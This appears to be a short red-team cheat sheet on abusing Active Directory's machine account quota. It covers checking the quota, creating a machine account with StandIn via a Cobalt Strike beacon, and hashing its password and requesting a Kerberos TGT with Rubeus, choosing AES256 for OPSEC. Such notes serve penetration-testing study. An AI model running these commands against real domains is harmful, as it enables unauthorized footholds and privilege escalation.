Any domain user may create machine accounts under a quota (defaults to 10). To determine the quota (replace distinguished name for domain):
powershell Get-DomainObject -Identity "DC=domain,DC=local" -Properties ms-DS-MachineAccountQuotaUse StandIn to create a machine account (Note: specify name without dollar sign). Make sure to record the password and the (sub)domain to which the computer belongs.
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer [machine-name] --makeDetermine the account hash with Rubeus:
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:[machine-account-pw] /user:[machine-account] /domain:[machine-domain]Use AES256 password hash to obtain TGT (preferred over RC4 due to OPSEC):
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[machine-account] /aes256:[aes256-hash] /nowrap